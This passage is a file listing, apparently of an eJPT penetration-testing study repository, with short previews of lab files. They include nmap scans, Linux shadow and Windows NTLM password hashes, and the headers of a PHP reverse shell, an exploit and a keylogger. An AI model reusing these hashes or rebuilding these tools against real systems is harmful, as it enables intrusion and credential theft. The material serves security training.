"preview": "<?php\n// php-reverse-shell - A Reverse Shell implementation in PHP\n// Copyright (C) 2007 pentestmonkey@pentestmonkey.net"
},
{
"path": "ine-labs/black-box3/dot234/scan_xyz.txt",
"chars": 95,
"preview": "/.hta (Status: 403)\n/.htaccess (Status: 403)\n/.htpasswd (Status: 403)\n/index.php (Status: 200)\n"
},
{
"path": "ine-labs/black-box3/thorough_nmap_scan.txt",
"chars": 3318,
"preview": "# Nmap 7.91 scan initiated Thu Feb 25 20:05:44 2021 as: nmap -sV -n -T4 -Pn -p- -A -iL alive_hosts.txt -v --open -oN tho"
},
{
"path": "ine-labs/bruteforce-and-password-cracking/alive_hosts.txt",
"chars": 29,
"preview": "192.168.99.22\n192.168.99.100\n"
},
{
"path": "ine-labs/bruteforce-and-password-cracking/for_john.txt",
"chars": 14280,
"preview": "root:$6$NMfSi/bG$y9j8uMu4glpLudMRvzznUZ5h30jlobtAJGZYRaa64pdKy3i1WLTnmPPWUxfPdZwJKReFPU/zBo8HRpD.RAkrG1:0:0:root:/root:/"
},
{
"path": "ine-labs/bruteforce-and-password-cracking/nmap_scan.txt",
"chars": 692,
"preview": "# Nmap 7.91 scan initiated Sun Feb 21 14:10:57 2021 as: nmap -sV -iL alive_hosts.txt -oN nmap_scan.txt\nNmap scan report "
},
{
"path": "ine-labs/bruteforce-and-password-cracking/passwd",
"chars": 4677,
"preview": "root:x:0:0:root:/root:/bin/bash\ndaemon:x:1:1:daemon:/usr/sbin:/bin/sh\nbin:x:2:2:bin:/bin:/bin/sh\nsys:x:3:3:sys:/dev:/bin"
},
{
"path": "ine-labs/bruteforce-and-password-cracking/shadow",
"chars": 12785,
"preview": "root:$6$NMfSi/bG$y9j8uMu4glpLudMRvzznUZ5h30jlobtAJGZYRaa64pdKy3i1WLTnmPPWUxfPdZwJKReFPU/zBo8HRpD.RAkrG1:16475:0:99999:7:"
},
{
"path": "ine-labs/dirbuster/alive_hosts.txt",
"chars": 40,
"preview": "10.104.11.50\n10.104.11.96\n10.104.11.198\n"
},
{
"path": "ine-labs/dirbuster/nmap_scan.txt",
"chars": 999,
"preview": "# Nmap 7.91 scan initiated Thu Feb 18 13:45:12 2021 as: nmap -sV -iL alive_hosts.txt -oN nmap_scan.txt\nNmap scan report "
},
{
"path": "ine-labs/exploit-based-cpp/exploit.cpp",
"chars": 2225,
"preview": "#define _WINSOCK_DEPRECATED_NO_WARNINGS\n#pragma comment(lib, \"Ws2_32.lib\")\n\n#include <winsock2.h>\n#include <stdio.h>\n#in"
},
{
"path": "ine-labs/exploit-based-cpp/keylogger.cpp",
"chars": 1014,
"preview": "#define _WINSOCK_DEPRECATED_NO_WARNINGS\n#pragma comment(lib, \"Ws2_32.lib\")\n\n#include <winsock2.h>\n#include <stdio.h>\n#in"
},
{
"path": "ine-labs/metasploit/README.md",
"chars": 4002,
"preview": "# Metasploit Lab\n\n## Description\n\nIn this lab, you will have to use Metasploit and meterpreter against a real\nmachine; t"
},
{
"path": "ine-labs/metasploit/hashdump.txt",
"chars": 506,
"preview": "Administrator:500:e52cac67419a9a224a3b108f3fa6cb6d:8846f7eaee8fb117ad06bdd830b7586c:::\neLSAdmin:1003:aad3b435b51404eeaad"
},
{
"path": "ine-labs/metasploit/nmap_scan.txt",
"chars": 982,
"preview": "# Nmap 7.91 scan initiated Tue Feb 23 12:43:57 2021 as: nmap -sV -oN nmap_scan.txt 192.168.99.100/24\nNmap scan report fo"
},
{
"path": "ine-labs/nessus/nmap_scan.txt",
"chars": 2615,
"preview": "# Nmap 7.91 scan initiated Thu Feb 18 12:17:44 2021 as: nmap -A -oN nmap_scan.txt 192.168.99.70/24\nNmap scan report for "
},
{
"path": "ine-labs/null-session/Congratulations.txt",
"chars": 66,
"preview": "Congratulations! You have successfully exploited a null session!\r\n"
},
{
"path": "ine-labs/null-session/alive_hosts.txt",
"chars": 30,
"preview": "192.168.99.100\n192.168.99.162\n"
},
{
"path": "ine-labs/null-session/enum4linux_scan.txt",
"chars": 8737,
"preview": "Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Sun Feb 21 17:22:35 2021\n\n ======"
},
{
"path": "ine-labs/null-session/nmap_scan.txt",
"chars": 808,
"preview": "# Nmap 7.91 scan initiated Sun Feb 21 17:08:32 2021 as: nmap -sV -iL alive_hosts.txt -oN nmap_scan.txt\nNmap scan report "
},
{
"path": "ine-labs/practice/hello.php",
"chars": 124,
"preview": "<html>\n <head>\n <title>Test PHP</title>\n </head>\n\n <body>\n <?php echo '<p> Hello World!</p>'; ?>\n </body>\n</ht"
},
{
"path": "ine-labs/practice/index.html",
"chars": 138,
"preview": "<html>\n <head>\n <title>Test PHP</title>\n </head>\n\n <body>\n <p>\n Welcome to my custom web server!\n </p>\n"
},
{
"path": "ine-labs/practice/my-ls.sh",
"chars": 54,
"preview": "#!/bin/bash\n\nfor i in $(ls); do\n\techo \"item: $i\"\ndone\n"
},
{
"path": "ine-labs/practice/script.sh",
"chars": 178,
"preview": "#!/bin/bash\n\nx=444\ny=321\n\nif [ \"$x\" -eq \"$y\" ]; then\n\techo \"The values are equal!\";\nelif [ \"$x\" -lt \"$y\" ]; then\n\techo \""
},
{
"path": "ine-labs/practice/sequences.sh",
"chars": 233,
"preview": "#!/bin/bash\n\necho \"Two ways to iterate over a sequence of numbers!\"\n\necho \"option 1: use the seq command\"\nfor i in $(seq"
},
{
"path": "ine-labs/practice/shell.php",
"chars": 312,
"preview": "<html>\n <head>\n <title>Simple PHP Shell</title>\n </head>\n\n <body>\n <!-- Simple text form to enter commands -->\n"
},
{
"path": "ine-labs/python-assisted-exploitation/brute-forcer.py",
"chars": 1014,
"preview": "from bs4 import BeautifulSoup\nimport requests\n\ndef get_html(url):\n\tresponse = requests.get(url)\n\thtml = response.text\n\tr"
},
{
"path": "ine-labs/scanning-and-os-fingerprinting/fping_scan.txt",
"chars": 98,
"preview": "10.142.111.1\n10.142.111.6\n10.142.111.48\n10.142.111.96\n10.142.111.99\n10.142.111.100\n10.142.111.240\n"
},
{
"path": "ine-labs/scanning-and-os-fingerprinting/nmap_ping_scan.txt",
"chars": 711,
"preview": "# Nmap 7.91 scan initiated Wed Feb 17 22:20:54 2021 as: nmap -sn -oN nmap_ping_scan.txt 10.142.111.*\nNmap scan report fo"
},
{
"path": "ine-labs/scanning-and-os-fingerprinting/nmap_syn_scan.txt",
"chars": 1505,
"preview": "# Nmap 7.91 scan initiated Wed Feb 17 22:22:53 2021 as: nmap -sS -iL fping_scan.txt -oN nmap_syn_scan.txt\nNmap scan repo"
},
{
"path": "ine-labs/scanning-and-os-fingerprinting/nmap_version_and_os.txt",
"chars": 6731,
"preview": "# Nmap 7.91 scan initiated Wed Feb 17 22:24:04 2021 as: nmap -O -sV -iL fping_scan.txt -oN nmap_version_and_os.txt\nNmap "
},
{
"path": "scripts/eEnum.sh",
"chars": 449,
"preview": "#!/bin/bash\n# A wrapper for fping and nmap to help automate the host enumeration.\n\nTARGET=$1\nHOST_FILE=\"alive_hosts.txt\""
}
]
About this extraction
This page contains the full source code of the JasonTurley/eJPT GitHub repository, extracted and formatted as plain text for AI agents and large language models (LLMs). The extraction includes 71 files (126.3 KB), approximately 57.9k tokens, and a symbol index with 10 extracted functions, classes, methods, constants, and types. Use this with OpenClaw, Claude, ChatGPT, Cursor, Windsurf, or any other AI tool that accepts text input. You can copy the full output to your clipboard or download it as a .txt file.
Extracted by GitExtract — free GitHub repo to text converter for AI. Built by Nikandr Surkov.